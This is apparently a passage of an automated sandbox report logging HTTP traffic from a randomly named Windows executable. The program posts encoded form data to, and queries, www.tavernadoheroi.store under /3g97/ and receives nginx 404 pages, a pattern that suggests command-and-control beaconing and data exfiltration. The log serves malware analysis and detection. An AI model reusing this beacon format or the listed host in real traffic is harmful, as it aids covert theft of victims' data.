20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:20.921866894 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:20.921885967 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.449756162.240.81.18801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:23.451829910 CEST10851OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tavernadoheroi.store
                                                                                              Referer: http://www.tavernadoheroi.store/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 76 38 61 4a 36 71 78 45 44 34 57 74 42 30 68 54 46 44 4f 41 45 4f 6e 51 45 4f 41 2b 5a 46 36 30 4e 31 46 4f 2f 65 69 47 70 6c 36 38 46 4d 57 4e 36 78 68 4f 78 31 47 49 6a 6e 61 32 36 69 59 79 6f 43 6f 6a 2f 4c 6f 57 59 6c 55 73 63 6a 38 4e 66 49 6d 33 37 39 70 4e 71 63 53 48 53 75 54 62 4d 78 42 36 4c 77 61 58 51 6c 70 77 35 6b 51 74 68 44 36 57 7a 4d 72 32 61 78 46 58 51 67 38 52 72 68 4c 45 74 70 74 4b 6d 62 33 30 36 63 32 50 6c 58 33 33 6c 41 63 79 56 51 45 67 49 4a 75 31 64 4f 35 4f 6f 52 6e 4c 63 78 70 4c 72 63 46 6d 76 57 44 35 73 42 41 4d 34 79 79 33 46 73 6b 59 53 75 58 6c 34 34 70 35 77 68 44 53 59 77 49 5a 65 67 65 75 49 4f 61 55 55 79 39 44 2f 54 39 54 59 33 67 70 58 36 55 76 6d 49 2f 4e 6d 4b 2f 34 67 66 53 74 63 62 49 56 4a 35 42 6d 76 39 4f 61 68 72 2b 64 51 78 50 54 75 6c 57 58 53 62 77 45 74 32 4b 4a 6a 41 47 45 36 31 55 56 4f 77 70 76 4a 2b 64 39 5a 55 73 52 36 56 4f 6d 5a 6c 6d 38 6b 61 6a 72 2f 34 46 58 6a 4b 6a 41 74 69 6d 66 64 46 56 68 54 6b 32 7a 30 30 61 6d 2b 69 59 66 45 4a 4d 35 61 71 41 67 69 64 66 61 76 52 57 49 6d 6e 39 5a 37 77 59 6b 58 6b 68 69 4e 4b 6b 68 4e 2b 6c 69 45 71 6b 4e 36 37 7a 68 50 4a 63 4e 49 41 4e 44 6a 34 37 4d 7a 38 4d 4b 47 38 58 7a 67 79 67 6c 57 44 52 55 34 44 44 49 6a 4e 72 62 57 59 43 69 4b 34 54 50 7a 4b 64 66 6a 52 56 55 31 71 74 4c 75 67 5a 56 4b 62 78 72 37 48 78 76 65 30 78 43 4e 74 6d 71 6f 39 31 58 62 36 55 47 75 49 77 72 35 68 52 6e 71 61 34 63 6a 47 4b 4e 58 30 79 76 76 32 6a 6e 48 67 55 65 38 46 63 6c 6a 35 79 7a 44 70 37 56 41 6c 56 49 77 52 30 64 73 35 69 70 36 4d 6d 70 30 76 48 53 53 31 44 4b 33 58 6f 64 45 57 77 70 2f 6e 31 59 34 51 75 4c 61 62 30 55 56 41 57 39 4a 4c 39 4f 6f 78 38 2f 56 38 63 6a 64 55 76 64 66 4b 72 4f 4e 42 78 2b 44 4b 44 53 35 56 76 55 75 77 6e 6a 33 52 4a 77 35 6f 4e 72 72 67 31 66 36 38 4a 59 41 71 56 62 31 71 4d 6a 30 62 6e 52 39 30 52 52 72 65 32 42 73 6a 79 6d 66 4d 64 69 33 5a 5a 6c 50 74 70 53 6c 58 69 75 4b 53 71 4a 77 2b 42 49 41 76 33 52 6b 57 4d 67 73 6a 31 43 2f 34 76 44 75 43 62 65 42 32 39 71 6f 44 4a 4c 5a 46 6d 4b 41 42 62 63 61 73 67 58 33 2b 31 73 36 75 4d 72 63 70 68 7a 76 6f 5a 4d 73 51 47 62 77 49 66 54 39 37 4b 54 36 4f 42 54 6c 61 66 74 58 50 69 43 41 50 6b 65 5a 4a 6d 51 33 58 46 6d 41 42 64 44 41 54 43 65 41 57 58 53 34 39 33 49 4e 58 6a 4a 7a 34 35 6e 79 66 4d 6a 42 53 6f 58 77 52 57 68 58 56 61 4b 5a 48 76 45 78 32 6d 49 57 6a 4d 46 78 4c 62 61 53 65 33 66 70 4b 69 55 39 4c 2b 49 75 63 66 74 78 39 6f 4d 45 49 39 65 55 63 50 32 45 2f 54 49 6b 39 4c 70 31 6f 50 63 49 33 30 74 67 61 57 72 57 57 7a 2f 35 32 36 64 71 50 6d 59 54 43 4f 67 67 51 7a 78 57 7a 6a 74 34 49 69 2b 6f 6b 79 48 64 4d 48 33 4f 79 57 39 70 38 42 68 66 58 31 74 53 6d 38 30 6c 56 75 59 63 4d 6b 48 42 2f 50 51 4d 76 2b 67 59 69 78 42 42 71 4a 6c 7a 64 7a 39 78 4e 44 58 49 53 32 6a 63 6f 62 6f 54 39 53 42 74 33 4f 6c 43 56 77 30 4f 5a 49 36 6b 68 49 55 61 51 37 34 2b 33 41 4e 5a 61 54 44 53 6e 38 78 58 43 6b 4e 62 38 44 67 36 6e 71 51 4a 46 6d 58 36 45 30 4e 6c 44 4c 39 79 6d 47 32 45 6e 70 63 74 43 65 6a 71 38 2b 4b 30 69 55 66 4d 69 70 33 6f 45 76 51 54 78 55 67 31 6c 53 43 74 75 4e 54 37 55 66 5a 69 4a 78 74 6e 50 58 4f 4b 33 64 30 6b 78 64 66 33 52 46 6e 69 4c 4b 4c 6e 56 36 48 53 2f 7a 66 35 41 75 48 6b 5a 48 32 4c 51 51 79 4e 4e 55 50 49 6b 77 42 58 56 44 59 74 70 32 6c 7a 5a 63 66 71 4f 77 44 75 74 4e 66 53 73 4b 33 77 33 48 66 59 41 4b 45 65 4a 44 31 67 31 49 30 6c 4f 4c 6b 45 6c 71 73 65 41 69 4f 64 48 51 4f 33 55 5a 5a 37 4c 2f 61 72 44 49 36 42 48 32 36 69 4e 36 57 4e 56 71 45 62 68 4d 71 32 44 32 76 6f 52 49 77 58 37 32 38 64 32 39 65 31 45 55 48 37 63 31 30 73 73 32 6d 2b 31 45 56 6c 56 58 57 6f 48 6b 53 58 31 38 47 45 33 37 39 62 72 32 63 75 2b 62 36 6f 63 41 62 32 44 47 5a 6b 42 65 41 35 6c 38 43 67 32 54 6d 50 45 4b 52 59 77 4c 35 57 33 44 32 51 6e 73 70 69 6f 50 4e 41 6f 4d 76 2b 62 64 41 61 32 74 36 4b 79 73 38 35 4d 75 35 45 34 4a 64 69 52 6f 63 2b 50 41 39 71 32 30 51 61 4a 2b 6c 73 59 70 6e 59 32 5a 38 76 38 5a 6b 71 6a 30 66 55 67 70 42 4b 30 7a 4a 49 56 31 42 76 6b 52 68 79 52 41 56 78 45 7a 58 50
                                                                                              Data Ascii: 12l42=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
                                                                                              Apr 24, 2024 07:27:23.632837057 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                              Apr 24, 2024 07:27:23.632946014 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                              Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                              Apr 24, 2024 07:27:23.633291960 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                              Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.449757162.240.81.18801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:26.171804905 CEST462OUTGET /3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.tavernadoheroi.store
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:27:26.353187084 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.1
                                                                                              Date: Wed, 24 Apr 2024 05:27:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 3650
                                                                                              Connection: close
                                                                                              ETag: "636d2d22-e42"
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 